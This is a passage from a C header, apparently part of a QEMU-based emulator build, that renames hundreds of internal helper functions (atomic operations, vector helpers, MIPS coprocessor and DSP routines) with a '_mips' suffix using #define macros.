helper_atomic_or_fetchb_mips #define helper_atomic_xor_fetchb helper_atomic_xor_fetchb_mips #define helper_atomic_fetch_sminb helper_atomic_fetch_sminb_mips #define helper_atomic_fetch_uminb helper_atomic_fetch_uminb_mips #define helper_atomic_fetch_smaxb helper_atomic_fetch_smaxb_mips #define helper_atomic_fetch_umaxb helper_atomic_fetch_umaxb_mips #define helper_atomic_smin_fetchb helper_atomic_smin_fetchb_mips #define helper_atomic_umin_fetchb helper_atomic_umin_fetchb_mips #define helper_atomic_smax_fetchb helper_atomic_smax_fetchb_mips #define helper_atomic_umax_fetchb helper_atomic_umax_fetchb_mips #define helper_atomic_cmpxchgw_le helper_atomic_cmpxchgw_le_mips #define helper_atomic_xchgw_le helper_atomic_xchgw_le_mips #define helper_atomic_fetch_addw_le helper_atomic_fetch_addw_le_mips #define helper_atomic_fetch_andw_le helper_atomic_fetch_andw_le_mips #define helper_atomic_fetch_orw_le helper_atomic_fetch_orw_le_mips #define helper_atomic_fetch_xorw_le helper_atomic_fetch_xorw_le_mips #define helper_atomic_add_fetchw_le helper_atomic_add_fetchw_le_mips #define helper_atomic_and_fetchw_le helper_atomic_and_fetchw_le_mips #define helper_atomic_or_fetchw_le helper_atomic_or_fetchw_le_mips #define helper_atomic_xor_fetchw_le helper_atomic_xor_fetchw_le_mips #define helper_atomic_fetch_sminw_le helper_atomic_fetch_sminw_le_mips #define helper_atomic_fetch_uminw_le helper_atomic_fetch_uminw_le_mips #define helper_atomic_fetch_smaxw_le helper_atomic_fetch_smaxw_le_mips #define helper_atomic_fetch_umaxw_le helper_atomic_fetch_umaxw_le_mips #define helper_atomic_smin_fetchw_le helper_atomic_smin_fetchw_le_mips #define helper_atomic_umin_fetchw_le helper_atomic_umin_fetchw_le_mips #define helper_atomic_smax_fetchw_le helper_atomic_smax_fetchw_le_mips #define helper_atomic_umax_fetchw_le helper_atomic_umax_fetchw_le_mips #define helper_atomic_cmpxchgw_be helper_atomic_cmpxchgw_be_mips #define helper_atomic_xchgw_be helper_atomic_xchgw_be_mips #define helper_atomic_fetch_andw_be helper_atomic_fetch_andw_be_mips #define helper_atomic_fetch_orw_be helper_atomic_fetch_orw_be_mips #define helper_atomic_fetch_xorw_be helper_atomic_fetch_xorw_be_mips #define helper_atomic_and_fetchw_be helper_atomic_and_fetchw_be_mips #define helper_atomic_or_fetchw_be helper_atomic_or_fetchw_be_mips #define helper_atomic_xor_fetchw_be helper_atomic_xor_fetchw_be_mips #define helper_atomic_fetch_sminw_be helper_atomic_fetch_sminw_be_mips #define helper_atomic_fetch_uminw_be helper_atomic_fetch_uminw_be_mips #define helper_atomic_fetch_smaxw_be helper_atomic_fetch_smaxw_be_mips #define helper_atomic_fetch_umaxw_be helper_atomic_fetch_umaxw_be_mips #define helper_atomic_smin_fetchw_be helper_atomic_smin_fetchw_be_mips #define helper_atomic_umin_fetchw_be helper_atomic_umin_fetchw_be_mips #define helper_atomic_smax_fetchw_be helper_atomic_smax_fetchw_be_mips #define helper_atomic_umax_fetchw_be helper_atomic_umax_fetchw_be_mips #define helper_atomic_fetch_addw_be helper_atomic_fetch_addw_be_mips #define helper_atomic_add_fetchw_be helper_atomic_add_fetchw_be_mips #define helper_atomic_cmpxchgl_le helper_atomic_cmpxchgl_le_mips #define helper_atomic_xchgl_le helper_atomic_xchgl_le_mips #define helper_atomic_fetch_addl_le helper_atomic_fetch_addl_le_mips #define helper_atomic_fetch_andl_le helper_atomic_fetch_andl_le_mips #define helper_atomic_fetch_orl_le helper_atomic_fetch_orl_le_mips #define helper_atomic_fetch_xorl_le helper_atomic_fetch_xorl_le_mips #define helper_atomic_add_fetchl_le helper_atomic_add_fetchl_le_mips #define helper_atomic_and_fetchl_le helper_atomic_and_fetchl_le_mips #define helper_atomic_or_fetchl_le helper_atomic_or_fetchl_le_mips #define helper_atomic_xor_fetchl_le helper_atomic_xor_fetchl_le_mips #define helper_atomic_fetch_sminl_le helper_atomic_fetch_sminl_le_mips #define helper_atomic_fetch_uminl_le helper_atomic_fetch_uminl_le_mips #define helper_atomic_fetch_smaxl_le helper_atomic_fetch_smaxl_le_mips #define helper_atomic_fetch_umaxl_le helper_atomic_fetch_umaxl_le_mips #define helper_atomic_smin_fetchl_le helper_atomic_smin_fetchl_le_mips #define helper_atomic_umin_fetchl_le helper_atomic_umin_fetchl_le_mips #define helper_atomic_smax_fetchl_le helper_atomic_smax_fetchl_le_mips #define helper_atomic_umax_fetchl_le helper_atomic_umax_fetchl_le_mips #define helper_atomic_cmpxchgl_be helper_atomic_cmpxchgl_be_mips #define helper_atomic_xchgl_be helper_atomic_xchgl_be_mips #define helper_atomic_fetch_andl_be helper_atomic_fetch_andl_be_mips #define helper_atomic_fetch_orl_be helper_atomic_fetch_orl_be_mips #define helper_atomic_fetch_xorl_be helper_atomic_fetch_xorl_be_mips #define helper_atomic_and_fetchl_be helper_atomic_and_fetchl_be_mips #define helper_atomic_or_fetchl_be helper_atomic_or_fetchl_be_mips #define helper_atomic_xor_fetchl_be helper_atomic_xor_fetchl_be_mips #define helper_atomic_fetch_sminl_be helper_atomic_fetch_sminl_be_mips #define helper_atomic_fetch_uminl_be helper_atomic_fetch_uminl_be_mips #define helper_atomic_fetch_smaxl_be helper_atomic_fetch_smaxl_be_mips #define helper_atomic_fetch_umaxl_be helper_atomic_fetch_umaxl_be_mips #define helper_atomic_smin_fetchl_be helper_atomic_smin_fetchl_be_mips #define helper_atomic_umin_fetchl_be helper_atomic_umin_fetchl_be_mips #define helper_atomic_smax_fetchl_be helper_atomic_smax_fetchl_be_mips #define helper_atomic_umax_fetchl_be helper_atomic_umax_fetchl_be_mips #define helper_atomic_fetch_addl_be helper_atomic_fetch_addl_be_mips #define helper_atomic_add_fetchl_be helper_atomic_add_fetchl_be_mips #define helper_atomic_cmpxchgq_le helper_atomic_cmpxchgq_le_mips #define helper_atomic_xchgq_le helper_atomic_xchgq_le_mips #define helper_atomic_fetch_addq_le helper_atomic_fetch_addq_le_mips #define helper_atomic_fetch_andq_le helper_atomic_fetch_andq_le_mips #define helper_atomic_fetch_orq_le helper_atomic_fetch_orq_le_mips #define helper_atomic_fetch_xorq_le helper_atomic_fetch_xorq_le_mips #define helper_atomic_add_fetchq_le helper_atomic_add_fetchq_le_mips #define helper_atomic_and_fetchq_le helper_atomic_and_fetchq_le_mips #define helper_atomic_or_fetchq_le helper_atomic_or_fetchq_le_mips #define helper_atomic_xor_fetchq_le helper_atomic_xor_fetchq_le_mips #define helper_atomic_fetch_sminq_le helper_atomic_fetch_sminq_le_mips #define helper_atomic_fetch_uminq_le helper_atomic_fetch_uminq_le_mips #define helper_atomic_fetch_smaxq_le helper_atomic_fetch_smaxq_le_mips #define helper_atomic_fetch_umaxq_le helper_atomic_fetch_umaxq_le_mips #define helper_atomic_smin_fetchq_le helper_atomic_smin_fetchq_le_mips #define helper_atomic_umin_fetchq_le helper_atomic_umin_fetchq_le_mips #define helper_atomic_smax_fetchq_le helper_atomic_smax_fetchq_le_mips #define helper_atomic_umax_fetchq_le helper_atomic_umax_fetchq_le_mips #define helper_atomic_cmpxchgq_be helper_atomic_cmpxchgq_be_mips #define helper_atomic_xchgq_be helper_atomic_xchgq_be_mips #define helper_atomic_fetch_andq_be helper_atomic_fetch_andq_be_mips #define helper_atomic_fetch_orq_be helper_atomic_fetch_orq_be_mips #define helper_atomic_fetch_xorq_be helper_atomic_fetch_xorq_be_mips #define helper_atomic_and_fetchq_be helper_atomic_and_fetchq_be_mips #define helper_atomic_or_fetchq_be helper_atomic_or_fetchq_be_mips #define helper_atomic_xor_fetchq_be helper_atomic_xor_fetchq_be_mips #define helper_atomic_fetch_sminq_be helper_atomic_fetch_sminq_be_mips #define helper_atomic_fetch_uminq_be helper_atomic_fetch_uminq_be_mips #define helper_atomic_fetch_smaxq_be helper_atomic_fetch_smaxq_be_mips #define helper_atomic_fetch_umaxq_be helper_atomic_fetch_umaxq_be_mips #define helper_atomic_smin_fetchq_be helper_atomic_smin_fetchq_be_mips #define helper_atomic_umin_fetchq_be helper_atomic_umin_fetchq_be_mips #define helper_atomic_smax_fetchq_be helper_atomic_smax_fetchq_be_mips #define helper_atomic_umax_fetchq_be helper_atomic_umax_fetchq_be_mips #define helper_atomic_fetch_addq_be helper_atomic_fetch_addq_be_mips #define helper_atomic_add_fetchq_be helper_atomic_add_fetchq_be_mips #define cpu_ldub_code cpu_ldub_code_mips #define cpu_lduw_code cpu_lduw_code_mips #define cpu_ldl_code cpu_ldl_code_mips #define cpu_ldq_code cpu_ldq_code_mips #define helper_div_i32 helper_div_i32_mips #define helper_rem_i32 helper_rem_i32_mips #define helper_divu_i32 helper_divu_i32_mips #define helper_remu_i32 helper_remu_i32_mips #define helper_shl_i64 helper_shl_i64_mips #define helper_shr_i64 helper_shr_i64_mips #define helper_sar_i64 helper_sar_i64_mips #define helper_div_i64 helper_div_i64_mips #define helper_rem_i64 helper_rem_i64_mips #define helper_divu_i64 helper_divu_i64_mips #define helper_remu_i64 helper_remu_i64_mips #define helper_muluh_i64 helper_muluh_i64_mips #define helper_mulsh_i64 helper_mulsh_i64_mips #define helper_clz_i32 helper_clz_i32_mips #define helper_ctz_i32 helper_ctz_i32_mips #define helper_clz_i64 helper_clz_i64_mips #define helper_ctz_i64 helper_ctz_i64_mips #define helper_clrsb_i32 helper_clrsb_i32_mips #define helper_clrsb_i64 helper_clrsb_i64_mips #define helper_ctpop_i32 helper_ctpop_i32_mips #define helper_ctpop_i64 helper_ctpop_i64_mips #define helper_lookup_tb_ptr helper_lookup_tb_ptr_mips #define helper_exit_atomic helper_exit_atomic_mips #define helper_gvec_add8 helper_gvec_add8_mips #define helper_gvec_add16 helper_gvec_add16_mips #define helper_gvec_add32 helper_gvec_add32_mips #define helper_gvec_add64 helper_gvec_add64_mips #define helper_gvec_adds8 helper_gvec_adds8_mips #define helper_gvec_adds16 helper_gvec_adds16_mips #define helper_gvec_adds32 helper_gvec_adds32_mips #define helper_gvec_adds64 helper_gvec_adds64_mips #define helper_gvec_sub8 helper_gvec_sub8_mips #define helper_gvec_sub16 helper_gvec_sub16_mips #define helper_gvec_sub32 helper_gvec_sub32_mips #define helper_gvec_sub64 helper_gvec_sub64_mips #define helper_gvec_subs8 helper_gvec_subs8_mips #define helper_gvec_subs16 helper_gvec_subs16_mips #define helper_gvec_subs32 helper_gvec_subs32_mips #define helper_gvec_subs64 helper_gvec_subs64_mips #define helper_gvec_mul8 helper_gvec_mul8_mips #define helper_gvec_mul16 helper_gvec_mul16_mips #define helper_gvec_mul32 helper_gvec_mul32_mips #define helper_gvec_mul64 helper_gvec_mul64_mips #define helper_gvec_muls8 helper_gvec_muls8_mips #define helper_gvec_muls16 helper_gvec_muls16_mips #define helper_gvec_muls32 helper_gvec_muls32_mips #define helper_gvec_muls64 helper_gvec_muls64_mips #define helper_gvec_neg8 helper_gvec_neg8_mips #define helper_gvec_neg16 helper_gvec_neg16_mips #define helper_gvec_neg32 helper_gvec_neg32_mips #define helper_gvec_neg64 helper_gvec_neg64_mips #define helper_gvec_abs8 helper_gvec_abs8_mips #define helper_gvec_abs16 helper_gvec_abs16_mips #define helper_gvec_abs32 helper_gvec_abs32_mips #define helper_gvec_abs64 helper_gvec_abs64_mips #define helper_gvec_mov helper_gvec_mov_mips #define helper_gvec_dup64 helper_gvec_dup64_mips #define helper_gvec_dup32 helper_gvec_dup32_mips #define helper_gvec_dup16 helper_gvec_dup16_mips #define helper_gvec_dup8 helper_gvec_dup8_mips #define helper_gvec_not helper_gvec_not_mips #define helper_gvec_and helper_gvec_and_mips #define helper_gvec_or helper_gvec_or_mips #define helper_gvec_xor helper_gvec_xor_mips #define helper_gvec_andc helper_gvec_andc_mips #define helper_gvec_orc helper_gvec_orc_mips #define helper_gvec_nand helper_gvec_nand_mips #define helper_gvec_nor helper_gvec_nor_mips #define helper_gvec_eqv helper_gvec_eqv_mips #define helper_gvec_ands helper_gvec_ands_mips #define helper_gvec_xors helper_gvec_xors_mips #define helper_gvec_ors helper_gvec_ors_mips #define helper_gvec_shl8i helper_gvec_shl8i_mips #define helper_gvec_shl16i helper_gvec_shl16i_mips #define helper_gvec_shl32i helper_gvec_shl32i_mips #define helper_gvec_shl64i helper_gvec_shl64i_mips #define helper_gvec_shr8i helper_gvec_shr8i_mips #define helper_gvec_shr16i helper_gvec_shr16i_mips #define helper_gvec_shr32i helper_gvec_shr32i_mips #define helper_gvec_shr64i helper_gvec_shr64i_mips #define helper_gvec_sar8i helper_gvec_sar8i_mips #define helper_gvec_sar16i helper_gvec_sar16i_mips #define helper_gvec_sar32i helper_gvec_sar32i_mips #define helper_gvec_sar64i helper_gvec_sar64i_mips #define helper_gvec_shl8v helper_gvec_shl8v_mips #define helper_gvec_shl16v helper_gvec_shl16v_mips #define helper_gvec_shl32v helper_gvec_shl32v_mips #define helper_gvec_shl64v helper_gvec_shl64v_mips #define helper_gvec_shr8v helper_gvec_shr8v_mips #define helper_gvec_shr16v helper_gvec_shr16v_mips #define helper_gvec_shr32v helper_gvec_shr32v_mips #define helper_gvec_shr64v helper_gvec_shr64v_mips #define helper_gvec_sar8v helper_gvec_sar8v_mips #define helper_gvec_sar16v helper_gvec_sar16v_mips #define helper_gvec_sar32v helper_gvec_sar32v_mips #define helper_gvec_sar64v helper_gvec_sar64v_mips #define helper_gvec_eq8 helper_gvec_eq8_mips #define helper_gvec_ne8 helper_gvec_ne8_mips #define helper_gvec_lt8 helper_gvec_lt8_mips #define helper_gvec_le8 helper_gvec_le8_mips #define helper_gvec_ltu8 helper_gvec_ltu8_mips #define helper_gvec_leu8 helper_gvec_leu8_mips #define helper_gvec_eq16 helper_gvec_eq16_mips #define helper_gvec_ne16 helper_gvec_ne16_mips #define helper_gvec_lt16 helper_gvec_lt16_mips #define helper_gvec_le16 helper_gvec_le16_mips #define helper_gvec_ltu16 helper_gvec_ltu16_mips #define helper_gvec_leu16 helper_gvec_leu16_mips #define helper_gvec_eq32 helper_gvec_eq32_mips #define helper_gvec_ne32 helper_gvec_ne32_mips #define helper_gvec_lt32 helper_gvec_lt32_mips #define helper_gvec_le32 helper_gvec_le32_mips #define helper_gvec_ltu32 helper_gvec_ltu32_mips #define helper_gvec_leu32 helper_gvec_leu32_mips #define helper_gvec_eq64 helper_gvec_eq64_mips #define helper_gvec_ne64 helper_gvec_ne64_mips #define helper_gvec_lt64 helper_gvec_lt64_mips #define helper_gvec_le64 helper_gvec_le64_mips #define helper_gvec_ltu64 helper_gvec_ltu64_mips #define helper_gvec_leu64 helper_gvec_leu64_mips #define helper_gvec_ssadd8 helper_gvec_ssadd8_mips #define helper_gvec_ssadd16 helper_gvec_ssadd16_mips #define helper_gvec_ssadd32 helper_gvec_ssadd32_mips #define helper_gvec_ssadd64 helper_gvec_ssadd64_mips #define helper_gvec_sssub8 helper_gvec_sssub8_mips #define helper_gvec_sssub16 helper_gvec_sssub16_mips #define helper_gvec_sssub32 helper_gvec_sssub32_mips #define helper_gvec_sssub64 helper_gvec_sssub64_mips #define helper_gvec_usadd8 helper_gvec_usadd8_mips #define helper_gvec_usadd16 helper_gvec_usadd16_mips #define helper_gvec_usadd32 helper_gvec_usadd32_mips #define helper_gvec_usadd64 helper_gvec_usadd64_mips #define helper_gvec_ussub8 helper_gvec_ussub8_mips #define helper_gvec_ussub16 helper_gvec_ussub16_mips #define helper_gvec_ussub32 helper_gvec_ussub32_mips #define helper_gvec_ussub64 helper_gvec_ussub64_mips #define helper_gvec_smin8 helper_gvec_smin8_mips #define helper_gvec_smin16 helper_gvec_smin16_mips #define helper_gvec_smin32 helper_gvec_smin32_mips #define helper_gvec_smin64 helper_gvec_smin64_mips #define helper_gvec_smax8 helper_gvec_smax8_mips #define helper_gvec_smax16 helper_gvec_smax16_mips #define helper_gvec_smax32 helper_gvec_smax32_mips #define helper_gvec_smax64 helper_gvec_smax64_mips #define helper_gvec_umin8 helper_gvec_umin8_mips #define helper_gvec_umin16 helper_gvec_umin16_mips #define helper_gvec_umin32 helper_gvec_umin32_mips #define helper_gvec_umin64 helper_gvec_umin64_mips #define helper_gvec_umax8 helper_gvec_umax8_mips #define helper_gvec_umax16 helper_gvec_umax16_mips #define helper_gvec_umax32 helper_gvec_umax32_mips #define helper_gvec_umax64 helper_gvec_umax64_mips #define helper_gvec_bitsel helper_gvec_bitsel_mips #define cpu_restore_state cpu_restore_state_mips #define page_collection_lock page_collection_lock_mips #define page_collection_unlock page_collection_unlock_mips #define free_code_gen_buffer free_code_gen_buffer_mips #define tcg_exec_init tcg_exec_init_mips #define tb_cleanup tb_cleanup_mips #define tb_flush tb_flush_mips #define tb_phys_invalidate tb_phys_invalidate_mips #define tb_gen_code tb_gen_code_mips #define tb_exec_lock tb_exec_lock_mips #define tb_exec_unlock tb_exec_unlock_mips #define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_mips #define tb_invalidate_phys_range tb_invalidate_phys_range_mips #define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_mips #define tb_check_watchpoint tb_check_watchpoint_mips #define cpu_io_recompile cpu_io_recompile_mips #define tb_flush_jmp_cache tb_flush_jmp_cache_mips #define tcg_flush_softmmu_tlb tcg_flush_softmmu_tlb_mips #define translator_loop_temp_check translator_loop_temp_check_mips #define translator_loop translator_loop_mips #define helper_atomic_cmpxchgo_le_mmu helper_atomic_cmpxchgo_le_mmu_mips #define helper_atomic_cmpxchgo_be_mmu helper_atomic_cmpxchgo_be_mmu_mips #define helper_atomic_ldo_le_mmu helper_atomic_ldo_le_mmu_mips #define helper_atomic_ldo_be_mmu helper_atomic_ldo_be_mmu_mips #define helper_atomic_sto_le_mmu helper_atomic_sto_le_mmu_mips #define helper_atomic_sto_be_mmu helper_atomic_sto_be_mmu_mips #define unassigned_mem_ops unassigned_mem_ops_mips #define floatx80_infinity floatx80_infinity_mips #define dup_const_func dup_const_func_mips #define gen_helper_raise_exception gen_helper_raise_exception_mips #define gen_helper_raise_interrupt gen_helper_raise_interrupt_mips #define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_mips #define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_mips #define gen_helper_cpsr_read gen_helper_cpsr_read_mips #define gen_helper_cpsr_write gen_helper_cpsr_write_mips #define tlb_reset_dirty_by_vaddr tlb_reset_dirty_by_vaddr_mips #define helper_mfc0_mvpcontrol helper_mfc0_mvpcontrol_mips #define helper_mfc0_mvpconf0 helper_mfc0_mvpconf0_mips #define helper_mfc0_mvpconf1 helper_mfc0_mvpconf1_mips #define helper_mfc0_random helper_mfc0_random_mips #define helper_mfc0_tcstatus helper_mfc0_tcstatus_mips #define helper_mftc0_tcstatus helper_mftc0_tcstatus_mips #define helper_mfc0_tcbind helper_mfc0_tcbind_mips #define helper_mftc0_tcbind helper_mftc0_tcbind_mips #define helper_mfc0_tcrestart helper_mfc0_tcrestart_mips #define helper_mftc0_tcrestart helper_mftc0_tcrestart_mips #define helper_mfc0_tchalt helper_mfc0_tchalt_mips #define helper_mftc0_tchalt helper_mftc0_tchalt_mips #define helper_mfc0_tccontext helper_mfc0_tccontext_mips #define helper_mftc0_tccontext helper_mftc0_tccontext_mips #define helper_mfc0_tcschedule helper_mfc0_tcschedule_mips #define helper_mftc0_tcschedule helper_mftc0_tcschedule_mips #define helper_mfc0_tcschefback helper_mfc0_tcschefback_mips #define helper_mftc0_tcschefback helper_mftc0_tcschefback_mips #define helper_mfc0_count helper_mfc0_count_mips #define helper_mfc0_saar helper_mfc0_saar_mips #define helper_mfhc0_saar helper_mfhc0_saar_mips #define helper_mftc0_entryhi helper_mftc0_entryhi_mips #define helper_mftc0_cause helper_mftc0_cause_mips #define helper_mftc0_status helper_mftc0_status_mips #define helper_mfc0_lladdr helper_mfc0_lladdr_mips #define helper_mfc0_maar helper_mfc0_maar_mips #define helper_mfhc0_maar helper_mfhc0_maar_mips #define helper_mfc0_watchlo helper_mfc0_watchlo_mips #define helper_mfc0_watchhi helper_mfc0_watchhi_mips #define helper_mfhc0_watchhi helper_mfhc0_watchhi_mips #define helper_mfc0_debug helper_mfc0_debug_mips #define helper_mftc0_debug helper_mftc0_debug_mips #define helper_dmfc0_tcrestart helper_dmfc0_tcrestart_mips #define helper_dmfc0_tchalt helper_dmfc0_tchalt_mips #define helper_dmfc0_tccontext helper_dmfc0_tccontext_mips #define helper_dmfc0_tcschedule helper_dmfc0_tcschedule_mips #define helper_dmfc0_tcschefback helper_dmfc0_tcschefback_mips #define helper_dmfc0_lladdr helper_dmfc0_lladdr_mips #define helper_dmfc0_maar helper_dmfc0_maar_mips #define helper_dmfc0_watchlo helper_dmfc0_watchlo_mips #define helper_dmfc0_watchhi helper_dmfc0_watchhi_mips #define helper_dmfc0_saar helper_dmfc0_saar_mips #define helper_mtc0_index helper_mtc0_index_mips #define helper_mtc0_mvpcontrol helper_mtc0_mvpcontrol_mips #define helper_mtc0_vpecontrol helper_mtc0_vpecontrol_mips #define helper_mttc0_vpecontrol helper_mttc0_vpecontrol_mips #define helper_mftc0_vpecontrol helper_mftc0_vpecontrol_mips #define helper_mftc0_vpeconf0 helper_mftc0_vpeconf0_mips #define helper_mtc0_vpeconf0 helper_mtc0_vpeconf0_mips #define helper_mttc0_vpeconf0 helper_mttc0_vpeconf0_mips #define helper_mtc0_vpeconf1 helper_mtc0_vpeconf1_mips #define helper_mtc0_yqmask helper_mtc0_yqmask_mips #define helper_mtc0_vpeopt helper_mtc0_vpeopt_mips #define helper_mtc0_entrylo0 helper_mtc0_entrylo0_mips #define helper_dmtc0_entrylo0 helper_dmtc0_entrylo0_mips #define helper_mtc0_tcstatus helper_mtc0_tcstatus_mips #define helper_mttc0_tcstatus helper_mttc0_tcstatus_mips #define helper_mtc0_tcbind helper_mtc0_tcbind_mips #define helper_mttc0_tcbind helper_mttc0_tcbind_mips #define helper_mtc0_tcrestart helper_mtc0_tcrestart_mips #define helper_mttc0_tcrestart helper_mttc0_tcrestart_mips #define helper_mtc0_tchalt helper_mtc0_tchalt_mips #define helper_mttc0_tchalt helper_mttc0_tchalt_mips #define helper_mtc0_tccontext helper_mtc0_tccontext_mips #define helper_mttc0_tccontext helper_mttc0_tccontext_mips #define helper_mtc0_tcschedule helper_mtc0_tcschedule_mips #define helper_mttc0_tcschedule helper_mttc0_tcschedule_mips #define helper_mtc0_tcschefback helper_mtc0_tcschefback_mips #define helper_mttc0_tcschefback helper_mttc0_tcschefback_mips #define helper_mtc0_entrylo1 helper_mtc0_entrylo1_mips #define helper_dmtc0_entrylo1 helper_dmtc0_entrylo1_mips #define helper_mtc0_context helper_mtc0_context_mips #define helper_mtc0_memorymapid helper_mtc0_memorymapid_mips #define update_pagemask update_pagemask_mips #define helper_mtc0_pagemask helper_mtc0_pagemask_mips #define helper_mtc0_pagegrain helper_mtc0_pagegrain_mips #define helper_mtc0_segctl0 helper_mtc0_segctl0_mips #define helper_mtc0_segctl1 helper_mtc0_segctl1_mips #define helper_mtc0_segctl2 helper_mtc0_segctl2_mips #define helper_mtc0_pwfield helper_mtc0_pwfield_mips #define helper_mtc0_pwsize helper_mtc0_pwsize_mips #define helper_mtc0_wired helper_mtc0_wired_mips #define helper_mtc0_pwctl helper_mtc0_pwctl_mips #define helper_mtc0_srsconf0 helper_mtc0_srsconf0_mips #define helper_mtc0_srsconf1 helper_mtc0_srsconf1_mips #define helper_mtc0_srsconf2 helper_mtc0_srsconf2_mips #define helper_mtc0_srsconf3 helper_mtc0_srsconf3_mips #define helper_mtc0_srsconf4 helper_mtc0_srsconf4_mips #define helper_mtc0_hwrena helper_mtc0_hwrena_mips #define helper_mtc0_count helper_mtc0_count_mips #define helper_mtc0_saari helper_mtc0_saari_mips #define helper_mtc0_saar helper_mtc0_saar_mips #define helper_mthc0_saar helper_mthc0_saar_mips #define helper_mtc0_entryhi helper_mtc0_entryhi_mips #define helper_mttc0_entryhi helper_mttc0_entryhi_mips #define helper_mtc0_compare helper_mtc0_compare_mips #define helper_mtc0_status helper_mtc0_status_mips #define helper_mttc0_status helper_mttc0_status_mips #define helper_mtc0_intctl helper_mtc0_intctl_mips #define helper_mtc0_srsctl helper_mtc0_srsctl_mips #define helper_mtc0_cause helper_mtc0_cause_mips #define helper_mttc0_cause helper_mttc0_cause_mips #define helper_mftc0_epc helper_mftc0_epc_mips #define helper_mftc0_ebase helper_mftc0_ebase_mips #define helper_mtc0_ebase helper_mtc0_ebase_mips #define helper_mttc0_ebase helper_mttc0_ebase_mips #define helper_mftc0_configx helper_mftc0_configx_mips #define helper_mtc0_config0 helper_mtc0_config0_mips #define helper_mtc0_config2 helper_mtc0_config2_mips #define helper_mtc0_config3 helper_mtc0_config3_mips #define helper_mtc0_config4 helper_mtc0_config4_mips #define helper_mtc0_config5 helper_mtc0_config5_mips #define helper_mtc0_lladdr helper_mtc0_lladdr_mips #define helper_mtc0_maar helper_mtc0_maar_mips #define helper_mthc0_maar helper_mthc0_maar_mips #define helper_mtc0_maari helper_mtc0_maari_mips #define helper_mtc0_watchlo helper_mtc0_watchlo_mips #define helper_mtc0_watchhi helper_mtc0_watchhi_mips #define helper_mthc0_watchhi helper_mthc0_watchhi_mips #define helper_mtc0_xcontext helper_mtc0_xcontext_mips #define helper_mtc0_framemask helper_mtc0_framemask_mips #define helper_mtc0_debug helper_mtc0_debug_mips #define helper_mttc0_debug helper_mttc0_debug_mips #define helper_mtc0_performance0 helper_mtc0_performance0_mips #define helper_mtc0_errctl helper_mtc0_errctl_mips #define helper_mtc0_taglo helper_mtc0_taglo_mips #define helper_mtc0_datalo helper_mtc0_datalo_mips #define helper_mtc0_taghi helper_mtc0_taghi_mips #define helper_mtc0_datahi helper_mtc0_datahi_mips #define helper_mftgpr helper_mftgpr_mips #define helper_mftlo helper_mftlo_mips #define helper_mfthi helper_mfthi_mips #define helper_mftacx helper_mftacx_mips #define helper_mftdsp helper_mftdsp_mips #define helper_mttgpr helper_mttgpr_mips #define helper_mttlo helper_mttlo_mips #define helper_mtthi helper_mtthi_mips #define helper_mttacx helper_mttacx_mips #define helper_mttdsp helper_mttdsp_mips #define helper_dmt helper_dmt_mips #define helper_emt helper_emt_mips #define helper_dvpe helper_dvpe_mips #define helper_evpe helper_evpe_mips #define helper_dvp helper_dvp_mips #define helper_evp helper_evp_mips #define cpu_mips_get_random cpu_mips_get_random_mips #define cpu_mips_init cpu_mips_init_mips #define helper_absq_s_ph helper_absq_s_ph_mips #define helper_absq_s_qb helper_absq_s_qb_mips #define helper_absq_s_w helper_absq_s_w_mips #define helper_absq_s_ob helper_absq_s_ob_mips #define helper_absq_s_qh helper_absq_s_qh_mips #define helper_absq_s_pw helper_absq_s_pw_mips #define helper_addqh_ph helper_addqh_ph_mips #define helper_addqh_r_ph helper_addqh_r_ph_mips #define helper_addqh_r_w helper_addqh_r_w_mips #define helper_addqh_w helper_addqh_w_mips #define helper_adduh_qb helper_adduh_qb_mips #define helper_adduh_r_qb helper_adduh_r_qb_mips #define helper_subqh_ph helper_subqh_ph_mips #define helper_subqh_r_ph helper_subqh_r_ph_mips #define helper_subqh_r_w helper_subqh_r_w_mips #define helper_subqh_w helper_subqh_w_mips #define helper_addq_ph helper_addq_ph_mips #define helper_addq_s_ph helper_addq_s_ph_mips #define helper_addq_s_w helper_addq_s_w_mips #define helper_addu_ph helper_addu_ph_mips #define helper_addu_qb helper_addu_qb_mips #define helper_addu_s_ph helper_addu_s_ph_mips #define helper_addu_s_qb helper_addu_s_qb_mips #define helper_subq_ph helper_subq_ph_mips #define helper_subq_s_ph helper_subq_s_ph_mips #define helper_subq_s_w helper_subq_s_w_mips #define helper_subu_ph helper_subu_ph_mips #define helper_subu_qb helper_subu_qb_mips #define helper_subu_s_ph helper_subu_s_ph_mips #define helper_subu_s_qb helper_subu_s_qb_mips #define helper_adduh_ob helper_adduh_ob_mips #define helper_adduh_r_ob helper_adduh_r_ob_mips #define helper_subuh_ob helper_subuh_ob_mips #define helper_subuh_r_ob helper_subuh_r_ob_mips #define helper_addq_pw helper_addq_pw_mips #define helper_addq_qh helper_addq_qh_mips #define helper_addq_s_pw helper_addq_s_pw_mips #define helper_addq_s_qh helper_addq_s_qh_mips #define helper_addu_ob helper_addu_ob_mips #define helper_addu_qh helper_addu_qh_mips #define helper_addu_s_ob helper_addu_s_ob_mips #define helper_addu_s_qh helper_addu_s_qh_mips #define helper_subq_pw helper_subq_pw_mips #define helper_subq_qh helper_subq_qh_mips #define helper_subq_s_pw helper_subq_s_pw_mips #define helper_subq_s_qh helper_subq_s_qh_mips #define helper_subu_ob helper_subu_ob_mips #define helper_subu_qh helper_subu_qh_mips #define helper_subu_s_ob helper_subu_s_ob_mips #define helper_subu_s_qh helper_subu_s_qh_mips #define helper_subuh_qb helper_subuh_qb_mips #define helper_subuh_r_qb helper_subuh_r_qb_mips #define helper_addsc helper_addsc_mips #define helper_addwc helper_addwc_mips #define helper_modsub helper_modsub_mips #define helper_raddu_w_qb helper_raddu_w_qb_mips #define helper_raddu_l_ob helper_raddu_l_ob_mips #define helper_precr_qb_ph helper_precr_qb_ph_mips #define helper_precrq_qb_ph helper_precrq_qb_ph_mips #define helper_precr_sra_ph_w helper_precr_sra_ph_w_mips #define helper_precr_sra_r_ph_w helper_precr_sra_r_ph_w_mips #define helper_precrq_ph_w helper_precrq_ph_w_mips #define helper_precrq_rs_ph_w helper_precrq_rs_ph_w_mips #define helper_precr_ob_qh helper_precr_ob_qh_mips #define helper_precr_sra_qh_pw helper_precr_sra_qh_pw_mips #define helper_precr_sra_r_qh_pw helper_precr_sra_r_qh_pw_mips #define helper_precrq_ob_qh helper_precrq_ob_qh_mips #define helper_precrq_qh_pw helper_precrq_qh_pw_mips #define 